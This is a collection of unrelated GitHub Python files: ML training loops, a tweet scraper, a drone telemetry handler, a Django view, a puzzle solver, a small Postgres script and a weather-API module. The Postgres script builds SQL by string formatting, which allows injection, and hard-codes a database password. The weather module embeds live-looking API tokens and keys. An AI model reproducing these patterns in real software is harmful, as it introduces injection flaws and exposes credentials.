model(train_image)\n\n train_losses = get_loss(train_preds, (train_label, train_depth, train_normal))\n\n if args.weight == 'equal' or args.weight == 'dwa':\n train_loss = torch.mean(sum(alpha_weight[i, epoch] * train_losses[i] for i in range(3)))\n else:\n train_loss = sum(1 / (2 * torch.exp(logsigma[i])) * train_losses[i] + logsigma[i] / 2 for i in range(3))\n\n train_loss.backward()\n optimizer.step()\n\n log.info('train loss of batch/epoch {}/{} is {}'.format(epoch, k, train_loss))\n\n cost[0] = train_losses[0].item()\n cost[1] = get_miou(train_preds[0], train_label, class_num=args.class_num).item()\n cost[2] = get_iou(train_preds[0], train_label).item()\n cost[3] = train_losses[1].item()\n cost[4], cost[5] = depth_error(train_preds[1], train_depth)\n cost[6] = train_losses[2].item()\n cost[7], cost[8], cost[9], cost[10], cost[11] = normal_error(train_preds[2], train_normal)\n cost[12] = train_loss\n avg_cost[:13] += cost[:13] / train_bts\n\n # evaluating test data\n model.eval()\n with torch.no_grad():\n for k, (val_image, val_label, val_depth, val_normal) in enumerate(val_loader):\n val_label = val_label.type(torch.LongTensor)\n if args.use_cuda:\n val_image, val_label, val_depth, val_normal = \\\n 
val_image.cuda(), val_label.cuda(), val_depth.cuda(), val_normal.cuda()\n\n val_preds, val_logsigma = model(val_image)\n val_losses = get_mtan_loss(val_preds, (val_label, val_depth, val_normal))\n\n if args.weight == 'equal' or args.weight == 'dwa':\n val_loss = torch.mean(sum(alpha_weight[i, epoch] * val_losses[i] for i in range(3)))\n else:\n val_loss = sum(\n 1 / (2 * torch.exp(val_logsigma[i])) * val_losses[i] + val_logsigma[i] / 2 for i in range(3))\n\n cost[13] = val_losses[0].item()\n cost[14] = get_miou(val_preds[0], val_label, args.class_num).item()\n cost[15] = get_iou(val_preds[0], val_label).item()\n cost[16] = val_losses[1].item()\n cost[17], cost[18] = depth_error(val_preds[1], val_depth)\n cost[19] = val_losses[2].item()\n cost[20], cost[21], cost[22], cost[23], cost[24] = normal_error(val_preds[2], val_normal)\n cost[25] = val_loss\n\n avg_cost[13:] += cost[13:] / val_bts\n\n print(\n 'Epoch: {:04d} | TRAIN: {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}'\n 'TEST: {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} | {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} '\n .format(epoch, *avg_cost[epoch, :]))\n keeper.save_loss(avg_cost.cpu().numpy(), 'losses.csv')\n\n if avg_cost[-1] < best_loss:\n best_loss = avg_cost[-1]\n keeper.save_checkpoint({\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_loss': best_loss,\n }, 'best_model.pth')\n\n keeper.save_checkpoint({\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'chk_loss': avg_cost[12],\n 'best_loss': best_loss,\n })\n\n log.info('training time of epoch {}/{} is {} \\n'.format(epoch + 1, args.epochs, time.time() - e_time))\n\n\nif __name__ == '__main__':\n set_random_seed()\n args = set_params()\n\n keeper = Keeper(args)\n log = keeper.setup_logger()\n log.info('Welcome to summoner\\'s rift')\n\n os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(e) for e in args.gpu_ids)\n args.use_cuda = torch.cuda.is_available()\n\n keeper.save_experiment_config()\n\n start_time = time.time()\n\n log.info(\"Thirty seconds until minion spawn!\")\n\n main(args)\n\n log.info('Victory! 
Total game time is: {}'.format(time.time()-start_time))\n\n","repo_name":"daniallin/Reconstruction","sub_path":"train_mtan.py","file_name":"train_mtan.py","file_ext":"py","file_size_in_byte":7541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"73822513828","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 20:06:23 2020\n\n@author: marccastillo\n\"\"\"\n\nimport os\nimport tweepy\n# import GetOldTweets3 as got # doesn't work right now\nimport pandas as pd\nfrom datetime import datetime\n\nconsumer_key = os.environ.get(\"CONSUMER_KEY\")\nconsumer_secret = os.environ.get(\"CONSUMER_SECRET\")\naccess_token = os.environ.get(\"ACCESS_TOKEN\")\naccess_secret = os.environ.get(\"ACCESS_SECRET\")\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\n\"\"\"\n# SCRATCH WORK; IGNORE THIS\n# query = \"Tesla OR Elon\"\n# tweets = tweepy.Cursor(api.search, q=query,\n# tweet_mode=\"extended\",\n# date_since = \"2020-09-01\",\n# lang=\"en\").items()\n\n# def tweet_text(tweet):\n# if hasattr(tweet, \"retweeted_status\"):\n# return tweet.retweeted_status.full_text\n# return tweet.full_text\n\n# data = [[tweet.id_str,\n# tweet.created_at,\n# tweet.favorite_count,\n# tweet.retweet_count,\n# tweet.user.screen_name, \n# tweet.user.followers_count,\n# tweet.source,\n# tweet_text(tweet)] for tweet in tweets]\n\n# columns = [\"id\",\n# \"date_time\",\n# \"likes\", \n# \"retweets\", \n# \"user\", \n# \"user_followers\",\n# \"source\",\n# \"body\"]\n\n# tweet_df = pd.DataFrame(data=data, columns=columns)\n# pd.to_datetime(tweet_df[\"date_time\"]).describe()\n\n\"\"\"\n\n# below constructs list of urls to tweets satistfying query; requires snscrape\n# takes a long time to run so comment out after running once\n# cmd = \"snscrape twitter-search \\\"#Tesla since:2020-01-01 until:2020-10-31\\\" > tesla.txt\"\n# os.system(cmd)\n\n# after tesla.txt is constructed:\ntweet_url = pd.read_csv(\"tesla.txt\", index_col=None, header=None, names=[\"links\"])\naf = lambda x: x[\"links\"].split(\"/\")[-1]\ntweet_url[\"id\"] = tweet_url.apply(af, axis=1)\n\nids = tweet_url[\"id\"].tolist()\n\n# this function from:\n# https://medium.com/@jcldinco/downloading-historical-tweets-using-tweet-ids-via-snscrape-and-tweepy-5f4ecbf19032\n# but also modified it a little so that the column names weren't made each time\ndef fetch_tw(ids):\n import os\n list_of_tw_status = api.statuses_lookup(ids, tweet_mode= \"extended\")\n empty_data = pd.DataFrame()\n for status in list_of_tw_status:\n tweet_elem = {\"id\": status.id,\n \"user\": status.user.screen_name,\n \"text\":status.full_text,\n \"date_time\":status.created_at}\n empty_data = empty_data.append(tweet_elem, ignore_index = True)\n file_name = \"tesla_tweets.csv\"\n if not os.path.isfile(file_name):\n empty_data.to_csv(file_name)\n else: \n empty_data.to_csv(file_name, mode=\"a\", header=False)\n \n \n# process 50 entries at a time, bc original author couldn't loop through literally everything\n\ntotal_count = len(ids)\nchunks = (total_count - 1) // 50 + 1\n\nfor i in range(chunks):\n batch = ids[i*50:(i+1)*50]\n result = fetch_tw(batch)\n \n \ntext = pd.read_csv(\"tesla_tweets.csv\")\n\n\n# test4 = test.drop_duplicates()\n# len(test[test[\"date_time\"]==\"date_time\"])\n# test2 = test.drop(test[test[\"date_time\"]==\"date_time\"].index)\n# 
test.nunique()\n# test3 = test2.drop_duplicates()\n# sampleid = test2[\"id\"][1]\n# test2[test2[\"id\"]==sampleid]\n","repo_name":"castillo-marc/NLP_Twitter","sub_path":"pull_tweets.py","file_name":"pull_tweets.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"3763145213","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nnp.random.seed(67)\n\nimport tensorflow as tf\n\nfrom tqdm import trange\n\ndef main():\n    X = tf.constant([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=tf.float32)\n    y = tf.constant([[0, 1, 1, 0]], dtype=tf.float32)\n\n    weights0 = tf.Variable(np.random.normal(size=(2, 4)), dtype=tf.float32)\n    weights1 = tf.Variable(np.random.normal(size=(4, 1)), dtype=tf.float32)\n\n    activations0 = tf.sigmoid(tf.matmul(X, weights0))\n    activations1 = tf.sigmoid(tf.matmul(activations0, weights1))\n\n    loss_op = tf.reduce_mean(tf.square(tf.transpose(y) - activations1))\n\n    parameters = [weights0, weights1]\n    gradients = tf.gradients(loss_op, parameters)\n\n    update_op = tf.group(*[\n        tf.assign(param, param - grad) \\\n        for param, grad in zip(parameters, gradients)\n    ])\n\n    tf.set_random_seed(67)\n\n    with tf.Session() as sess:\n        sess.run(tf.global_variables_initializer())\n        with trange(10000) as pbar_epoch:\n            for _ in pbar_epoch:\n                _, loss = sess.run([update_op, loss_op])\n                pbar_epoch.set_description('loss: {:.8f}'.format(loss))\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jimfleming/differentiation","sub_path":"tf_test.py","file_name":"tf_test.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"71"} +{"seq_id":"21940553713","text":"import logging\nfrom sport.control_code import SportControlCode\n\nfrom sport.frame import FrameDecoder, FrameEncoder\nfrom sport.physical_id import PhysicalId\nfrom util.uart_pumper import UartPumper\n\n_logger = logging.getLogger(\"sport_pumper\")\n\n\n# The Sport bus is managed by the FrSky receiver. It cycles through a sequence of physical IDs, transmitting an\n# invitation for each ID in turn to transmit. It pauses for about 12ms after each invite, giving the device with the\n# current ID a chance to transmit.\n# Simple devices just transmit their own data during their transmission slot and are uninterested in the data\n# transmitted by other devices. However, devices can also listen out for what each other transmits and use this as a\n# mechanism to communicate between themselves.\n# Important: the physical ID identifies a device - when invited to transmit, a given device can write data to the bus\n# and this data starts with a frame ID. The frame ID identifies the type of data and a device can use a different ID\n# each time its given an opportunity to transmit, e.g. it might transmit a current value one time, voltage the next\n# and temperature the next.\nclass SportPumper(UartPumper):\n    _BAUD_RATE = 57600\n\n    def __init__(self, tx, rx):\n        super().__init__(tx, rx, self._BAUD_RATE, echo=True)\n        self._frame_decoder = FrameDecoder()\n        self._frame_encoder = FrameEncoder()\n        self._frame_listener = None\n        self._subscribe_ids = {}\n        self._publish_ids = {}\n        self._has_physical_id = False\n\n    def add_subscriber(self, physical_id, subscriber):\n        self._subscribe_ids[physical_id] = subscriber\n\n    def add_publisher(self, physical_id, publisher):\n        self._publish_ids[physical_id] = publisher\n\n    def _consume(self, b, is_clear):\n        if b == SportControlCode.START:\n            self._has_physical_id = False\n        elif not self._has_physical_id:\n            self._has_physical_id = True\n            physical_id = b\n            # Check if we want to listen for data published by another device during this slot.\n            self._frame_listener = self._subscribe_ids.get(physical_id)\n            if self._frame_listener:\n                self._frame_decoder.reset()\n            else:\n                # Check if we want to publish data during this slot.\n                self._handle_publish(physical_id, is_clear)\n        elif self._frame_listener:\n            frame = self._frame_decoder.decode(b)\n            if frame:\n                if frame is not FrameDecoder.INVALID_FRAME:\n                    self._frame_listener(frame)\n                self._frame_listener = None\n        else:\n            _logger.debug(\"ignoring 0x%02X\", b)\n\n    def _handle_publish(self, physical_id, is_clear):\n        write_frame = self._publish_ids.get(physical_id)\n\n        if not write_frame:\n            return\n\n        if is_clear():\n            send = write_frame(self._frame_encoder.get_frame())\n            if send:\n                encoded_frame = self._frame_encoder.encode()\n                self._write(encoded_frame)\n        else:\n            # This could happen if we're reading too slowly or if some other device has stolen this slot.\n            _logger.error(\n                \"%s slot is not clear for writing\", PhysicalId.name(physical_id)\n            )\n","repo_name":"george-hawkins/drone-protocols","sub_path":"lib/sport/sport_pumper.py","file_name":"sport_pumper.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13987482733","text":"from django.shortcuts import render, redirect\n\n# Create your views here.\nfrom mainapp.models import NewsPost\nfrom .models import CommentsPost\nfrom .forms import CommentsPostForm\nfrom accounts.models import CustomUser\n\n\nfrom hitcount.models import HitCount\nfrom hitcount.views import HitCountMixin\n\n\ndef post_details(request, pk):\n    post = NewsPost.objects.get(id=pk)\n    # comment_author = CustomUser.objects.get(id=slug)\n    user = request.user\n    # Counting number of comments\n    qty_comment = CommentsPost.objects.filter(post=post.id).count()\n    # Count number of views\n    hit_count = HitCount.objects.get_for_object(post)\n    hit_count_response = HitCountMixin.hit_count(request, hit_count)\n    # Posting last three posts\n    lastThreeNews = NewsPost.objects.order_by('-date')[:3]\n\n    # Write comment\n    new_comment=None\n    comment_form = CommentsPostForm()\n    if request.method == 'POST':\n        comment_form = CommentsPostForm(request.POST)\n        if comment_form.is_valid():\n            parent_obj = None\n            try:\n                parent_id = int(request.POST.get('parent_id'))\n            except:\n                parent_id = None\n            if parent_id:\n                parent_obj = CommentsPost.objects.get(id=parent_id)\n                if parent_obj:\n                    parent_comment = comment_form.save(commit=False)\n                    parent_comment.parent = parent_obj\n                    \n            new_comment = comment_form.save(commit=False)\n            # author = CustomUser.objects.filter(email=user.email).first()\n            new_comment.post = post\n            # 
new_comment.comment_author = author\n \n new_comment.save()\n # return redirect('post_details',id=slug)\n return redirect('post_details',post.id)\n else:\n comment_form = CommentsPostForm()\n\n context = {\n 'comment_form':comment_form,\n 'post':post,\n 'qty_comment':qty_comment,\n 'lastThreeNews':lastThreeNews,\n 'hit_count':hit_count,\n 'hit_count_response':hit_count_response,\n 'new_comment':new_comment,\n\n # 'viewrCount':viewrCount\n # 'popular_posts':popular_posts\n }\n return render(request, 'post-details.html', context)","repo_name":"Khasan712/NewsBlog","sub_path":"commentsUser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31527129986","text":"def reconnaissance(un, sept, quatre, huit, liste5):\n segments = {i: None for i in range(1, 8)}\n segments[1] = etape1(sept, un)\n perms2s4 = etape2(un, quatre)\n perms1s4s7 = etape3(liste5)\n perms4s7 = perms1s4s7.difference({segments[1]})\n segments[2], segments[4], segments[7] = etape4(perms2s4, perms4s7)\n segments[6] = etape5(liste5,\n segments[2],\n segments[4],\n segments[7],\n segments[1])\n segments[3] = etape6(un, segments[6])\n segments[5] = etape7(huit, segments)\n return segments\n\n\ndef etape1(sept, un):\n for c in sept.difference(un):\n return c\n\n\ndef etape2(un, quatre):\n perms2s4 = quatre.difference(un)\n return perms2s4\n\n\ndef etape3(liste5):\n return liste5[0].intersection(liste5[1]).intersection(liste5[2])\n\n\ndef etape4(s2s4, s4s7):\n ss4 = s2s4.intersection(s4s7)\n ss2 = s2s4.difference(ss4)\n ss7 = s4s7.difference(ss4)\n for e in ss4: s4 = e\n for e in ss2: s2 = e\n for e in ss7: s7 = e\n return s2, s4, s7\n\n\ndef etape5(liste, s2, s4, s7, s1):\n for chiffre in liste:\n if s2 in chiffre and s4 in chiffre and s7 in chiffre:\n ss6 = chiffre.difference({s1, s2, s4, s7})\n for e in ss6:\n s6 = e\n return s6\n\n\ndef etape6(un, s6):\n for c in un.difference(s6):\n return c\n\n\ndef etape7(huit, segments):\n ens = set()\n for v in segments.values():\n if v:\n ens.add(v)\n for c in huit.difference(ens):\n return c\n\n\ndef base(s):\n mabase = {}\n mabase[tuple(sorted([s[1], s[2], s[3], s[5], s[6], s[7]]))] = 0\n mabase[tuple(sorted([s[3], s[6]]))] = 1\n mabase[tuple(sorted([s[1], s[3], s[4], s[5], s[7]]))] = 2\n mabase[tuple(sorted([s[1], s[3], s[4], s[6], s[7]]))] = 3\n mabase[tuple(sorted([s[2], s[3], s[4], s[6]]))] = 4\n mabase[tuple(sorted([s[1], s[2], s[4], s[6], s[7]]))] = 5\n mabase[tuple(sorted([s[1], s[2], s[4], s[5], s[6], s[7]]))] = 6\n mabase[tuple(sorted([s[1], s[3], s[6]]))] = 7\n mabase[tuple(sorted([s[1], s[2], s[3], s[4], s[5], s[6], s[7]]))] = 8\n mabase[tuple(sorted([s[1], s[2], s[3], s[4], s[6], s[7]]))] = 9\n return mabase\n\n\ndef main(fichier):\n with open(fichier) as fh:\n somme = 0\n for ligne in fh:\n chiffres = ligne.strip().split('|')[0].split()\n a_reconnaitre = ligne.strip().split('|')[1].split()\n liste_ens_cinq = []\n for c in chiffres:\n if len(c) == 2:\n un = set(list(c))\n elif len(c) == 3:\n sept = set(list(c))\n elif len(c) == 4:\n quatre = set(list(c))\n elif len(c) == 5:\n liste_ens_cinq.append(set(list(c)))\n elif len(c) == 7:\n huit = set(list(c))\n dico_seg = reconnaissance(un, sept, quatre, huit,\n liste_ens_cinq)\n ma_base = base(dico_seg)\n s = \"\"\n for chiffre in a_reconnaitre:\n cle = tuple(sorted(list(chiffre)))\n s += str(ma_base[cle])\n somme += int(s)\n return 
somme\n\n\nprint(main(\"jeu2.txt\"))\n","repo_name":"cobacdavid/aoc2021","sub_path":"day08/pb2.py","file_name":"pb2.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14267576287","text":"import pickle\n\nbase_dir = '/data1/icse-todo-reminder/data_split/'\n\nwith open(base_dir + 'anchor_samples_dict.pkl', 'rb') as handler:\n    anchor_samples = pickle.load(handler)\n\nwith open(base_dir + 'positive_samples_dict.pkl', 'rb') as handler:\n    positive_samples = pickle.load(handler)\n\nwith open(base_dir + 'negative_samples_dict.pkl', 'rb') as handler:\n    negative_samples = pickle.load(handler)\n\nwith open('./anchor_samples', 'w') as fa, \\\n    open('./positive_samples', 'w') as fp, \\\n    open('./negative_samples', 'w') as fn:\n\n    # for k, v in anchor_samples.items():\n    for i in range(len(anchor_samples)):\n        # print(k)\n        # print(v)\n        print(i)\n        if i in anchor_samples:\n            anchor_todo_comment_statement = anchor_samples[i]['anchor_todo_comment_statement']\n            anchor_todo_context = anchor_samples[i]['anchor_todo_context']\n            fa.write(anchor_todo_comment_statement + '\t' + anchor_todo_context)\n            fa.write('\n')\n\n            positive_todo_comment_statement = positive_samples[i]['positive_todo_comment_statement']\n            positive_todo_context = positive_samples[i]['positive_todo_context']\n            fp.write(positive_todo_comment_statement + '\t' + positive_todo_context)\n            fp.write('\n')\n\n            negative_todo_comment_statement = negative_samples[i]['negative_todo_comment_statement']\n            negative_todo_context = negative_samples[i]['negative_todo_context']\n            fn.write(negative_todo_comment_statement + '\t' + negative_todo_context)\n            fn.write('\n')\n\nprint(\"Finished!\")\n\n\n","repo_name":"TDPatcher/TDPatcher","sub_path":"model_train/0_Data_Prepare.py","file_name":"0_Data_Prepare.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73096675431","text":"import asyncio\nfrom .command_pattern import CommandPattern\nfrom typing import List\n\n\n\"\"\"\nmessage handler has three main functions\n\n1. create a handler to a pattern (decorator)\n2. run all handlers asynchronously if they match\n3. run a single handler if it matches\n\"\"\"\n\nclass MessageHandler:\n    def __init__(self):\n        self.handlers = []\n\n    def create_handler(self, pattern: str):\n        # return a decorator function which takes their\n        # function and adds it to the handlers as tuple\n        # (pattern : CommandPattern, handleFunction : function)\n\n        # translate the pattern\n        command_pattern = CommandPattern(pattern)\n\n        def decorated_handler(pattern_handler):\n            self.handlers.append((command_pattern, pattern_handler))\n            return pattern_handler\n\n        return decorated_handler\n\n    async def run_handlers(self, message, arguments: List[str]):\n        for command_pattern, pattern_handler in self.handlers:\n            pattern_object = command_pattern.gen_object(arguments)\n\n            if pattern_object is not None:\n                await pattern_handler(message, **pattern_object)\n\n\n\"\"\"\nI want to be able to do:\n\nmessage_handler = MessageHandler()\n\n...\n\n@client.createHandler('word something ')\nasync def function_name(message, variable, other_variable):\n    await do_something()\n\"\"\"\n\nif __name__ == '__main__':\n    message_handler = MessageHandler()\n\n    @message_handler.create_handler('list something')\n    async def poop(message):\n        await message.channel.send('hi')\n","repo_name":"jamseblew/discord-bot","sub_path":"scripts/handlers/message_handler.py","file_name":"message_handler.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"71954937511","text":"#!/usr/bin/python\n# encoding: utf-8\n\nfrom multiprocessing import Process, Queue\nimport time\n# 多进程间的通信\n\ndef p_put(q, *arg):\n    q.put(arg)\n    print(\"has put %s\" % arg)\n\ndef p_get(q, *arg):\n    print(\"%s wait to get ....\" % arg)\n    print(q.get())\n    print(\"%s got it \" % arg)\n\n\nif __name__ == '__main__':\n    q = Queue()\n    p1 = Process(target=p_put, args=(q, \"p1\", ))\n    p2 = Process(target=p_get, args=(q, \"p2\", ))\n    p1.start()\n    time.sleep(2)\n    p2.start()\n","repo_name":"emperwang/python_operation","sub_path":"base/mprocess/process_communicate.py","file_name":"process_communicate.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"21604072379","text":"from __future__ import print_function\nfrom absl import app\nimport mlperf_loadgen\n\n\ndef load_samples_to_ram(query_samples):\n    del query_samples\n    return\n\n\ndef unload_samples_from_ram(query_samples):\n    del query_samples\n    return\n\n\ndef issue_query(query_samples):\n    responses = []\n    for s in query_samples:\n        responses.append(mlperf_loadgen.QuerySampleResponse(s.id, 0, 0))\n    mlperf_loadgen.QuerySamplesComplete(responses)\n\n\ndef flush_queries():\n    pass\n\n\ndef main(argv):\n    del argv\n    settings = mlperf_loadgen.TestSettings()\n    settings.scenario = mlperf_loadgen.TestScenario.SingleStream\n    settings.mode = mlperf_loadgen.TestMode.PerformanceOnly\n\n    sut = mlperf_loadgen.ConstructSUT(issue_query, flush_queries)\n    qsl = mlperf_loadgen.ConstructQSL(\n        1024 * 1024, 1024, load_samples_to_ram, unload_samples_from_ram)\n    mlperf_loadgen.StartTest(sut, qsl, settings)\n    mlperf_loadgen.DestroyQSL(qsl)\n    mlperf_loadgen.DestroySUT(sut)\n\n\nif __name__ == \"__main__\":\n    app.run(main)\n","repo_name":"mlcommons/inference","sub_path":"loadgen/tests/perftests_null_sut.py","file_name":"perftests_null_sut.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":971,"dataset":"github-code","pt":"71"}
+{"seq_id":"1577011711","text":"import psycopg2\n\nconn = psycopg2.connect(\n host=\"localhost\",\n database=\"iris\",\n user=\"postgres\",\n password=\"1997713\"\n)\n\n\ndef insert(values):\n cursor = conn.cursor()\n select_query = \"insert into iris_table(sepal_length, sepal_width, petal_length, petal_width, variety)\" \\\n \" values({},{},{},{},\\'{}\\')\".format(*values)\n cursor.execute(select_query)\n # role_records = cursor.fetchall()\n # print(role_records)\n conn.commit()\n select_all()\n\n\ndef select_all():\n cursor = conn.cursor()\n select_query = \"select * from iris_table\"\n cursor.execute(select_query)\n role_records = cursor.fetchall()\n print(role_records)\n\n","repo_name":"leylakrz/review_python","sub_path":"connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14063025910","text":"# class Stack:\n\n# def __init__(self):\n# self.items = []\n\n# def isEmpty(self):\n# return self.items == []\n\n# def push(self, item):\n# self.items.append(item) \n\n# def pop(self):\n# return self.items.pop()\n\n# def peek(self):\n# return self.items[len(self.items)-1]\n\n# def count(self):\n# return len(self.items) \n\nfrom stack import Stack\n\ndef divBy2(decNumber, base):\n remStack = Stack()\n\n while decNumber > 0:\n rem = decNumber % base\n remStack.push(rem)\n decNumber = decNumber // base\n\n binString = ''\n while not remStack.isEmpty(): \n binString = binString + str(remStack.pop())\n return binString\n\nprint(divBy2(4,8)) ","repo_name":"iamdarshan7/Data-Struct-Algo","sub_path":"stack/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"35376463682","text":"import itertools\n\n#start dice donde empieza\n#step el paso\ncounter = itertools.count(start = 5,step= 2.5)\n\ndata = [100,200,300,400]\n#los mete a una tupla con un numero\ndaily_data = list(zip(itertools.count(), data))\n\nprint(daily_data)\n\nprint(next(counter))\nprint(next(counter))\nprint(next(counter))\nprint(next(counter))\n\nletters = [\"a\",\"b\",\"c\",\"d\"]\nnumbers = [0,1,2,3,4,5]\nnames = [\"Corey\", \"Nicole\"]\n\n#podemos hacer combinaciones y permutaciones\nresult = itertools.combinations(letters, 2)\n\nfor item in result:\n\tprint (item)\n\n#combinamos distintas listas\ncombined = itertools.chain(letters, numbers, names)\n\nfor item in combined:\n\tprint(item)\n\n\n#GroupBy\n\npeople = [\n {\n 'name': 'John Doe',\n 'city': 'Gotham',\n 'state': 'NY'\n },\n {\n 'name': 'Jane Doe',\n 'city': 'Kings Landing',\n 'state': 'NY'\n },\n {\n 'name': 'Corey Schafer',\n 'city': 'Boulder',\n 'state': 'CO'\n },\n {\n 'name': 'Al Einstein',\n 'city': 'Denver',\n 'state': 'CO'\n },\n {\n 'name': 'John Henry',\n 'city': 'Hinton',\n 'state': 'WV'\n },\n {\n 'name': 'Randy Moss',\n 'city': 'Rand',\n 'state': 'WV'\n },\n {\n 'name': 'Nicole K',\n 'city': 'Asheville',\n 'state': 'NC'\n },\n {\n 'name': 'Jim Doe',\n 'city': 'Charlotte',\n 'state': 'NC'\n },\n {\n 'name': 'Jane Taylor',\n 'city': 'Faketown',\n 'state': 'NC'\n }\n]\n\ndef get(person):\n\treturn person[\"state\"]\n\ndog = itertools.groupby(people, get)\n\nd = {}\nfor key, group in dog:\n\td[key] = len(list(group))\n\nprint(d)\n\nmax_key = max(d, 
key=d.get)\n\nprint(max_key)\n\t","repo_name":"AngelloDavincii/02-Aprendiendo","sub_path":"compu.py","file_name":"compu.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"75073351270","text":"import os, sys\nimport time, httplib\n# from gi.repository import GObject\n\n\n# def get_parent_path(folderpath, level=1):\n# parent_path = os.path.realpath(folderpath)\n# while(level > 0):\n# parent_path = os.path.dirname(parent_path)\n# level -= 1\n# return parent_path\n\n# def get_http_time():\n# try:\n# conn = httplib.HTTPConnection(\"www.beijing-time.org\")\n# conn.request(\"GET\", \"/time.asp\")\n# response = conn.getresponse()\n# if response.status == 200:\n# result = response.read()\n# data = result.split(\"\\r\\n\")\n# print data#['t0=new Date().getTime();', 'nyear=2014;', 'nmonth=5;', 'nday=7;', 'nwday=3;', 'nhrs=13;', 'nmin=32;', 'nsec=2;']\n# year = data[1][len(\"nyear\")+1 : len(data[1])-1]\n# month = data[2][len(\"nmonth\")+1 : len(data[2])-1]\n# day = data[3][len(\"nday\")+1 : len(data[3])-1]\n# hrs = data[5][len(\"nhrs\")+1 : len(data[5])-1]\n# bjtime = \"%s-%s-%s %s hour\" % (year, month, day, hrs)\n# print bjtime\n# except:\n# print \"00-00-00 00\"\n\ndef get_local_format_time():\n '''\n year-month-day hour:minute:second\n 2014-05-07 13:51:30\n '''\n local_date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n return local_date\n\n# def get_local_normal_time():\n# '''\n# year month day hour minute\n# 201405071351\n# '''\n# local_date = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\n# return local_date\n\n# WEATHER_URL = 'http://m.weather.com.cn/data/%s.html'\nWEATHER_URL = 'http://m.weather.com.cn/atad/%s.html'\nWEATHER_URL1 = 'http://www.weather.com.cn/data/sk/%s.html'\nWEATHER_URL2 = 'http://www.weather.com.cn/data/cityinfo/%s.html'\nPM25_URL = 'http://pm25.in/api/querys/pm2_5.json?city='\nWEATHER_URL_bak = 'http://api.k780.com:88/?app=weather.today&weaid=%s&appkey=13342&sign=94e85c3e0c85d051cca43fcada6881b9&format=json'\n# attention: PM2.5 APPKey From Email:kobe24_lixiang@126.com\nTOKEN = '&token=yqpL46DpUeYqcqsox7bM'\n# attention: PM2.5 APPKey From Email:xiangli@ubuntukylin.com\n#TOKEN = '&token=wYpDvD83HMDy553JqFNx'\n\n# PROJECT_ROOT_DIRECTORY = os.path.abspath(\n # os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))\n# DATA_PATH = os.path.join(PROJECT_ROOT_DIRECTORY, \"data\")\n# ICON_PATH = os.path.join(PROJECT_ROOT_DIRECTORY, \"icons\")\n# SERVER_IP = '192.168.30.156'#'192.168.1.105'#'192.168.30.156'#'192.168.30.231'#\n# SERVER_URL = 'http://' + SERVER_IP + ':8888/RPC2'\n# QSETTING_PATH = 'ubuntukylin/weaher-app'\n# QSETTING_FILE = 'ubuntukylin-weaher-app'\n","repo_name":"CrankyPants123/weather-server","sub_path":"api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"34285192546","text":"T = []\r\nn = eval(input('Insira o tamanho do seu vector: '))\r\nfor k in range (n):\r\n valor = eval(input('Insira um valor: '))\r\n T.append(valor)\r\nprint(T)\r\ndef soma(T, tamanho):\r\n if tamanho == 0:\r\n return 0\r\n else:\r\n return T[tamanho - 1] + soma(T, tamanho - 1)\r\n#EXECUÇÃO\r\nsoma(T, len(T))\r\nprint('Soma =',soma(T, len(T)))","repo_name":"6kenji/Python---Exercises---Resolutions","sub_path":"meus programas/alpr/FUNÇÕES RECURSIVAS/FUNÇÃO RECURSIVA PARA PREENCHER VALORES DE UM 
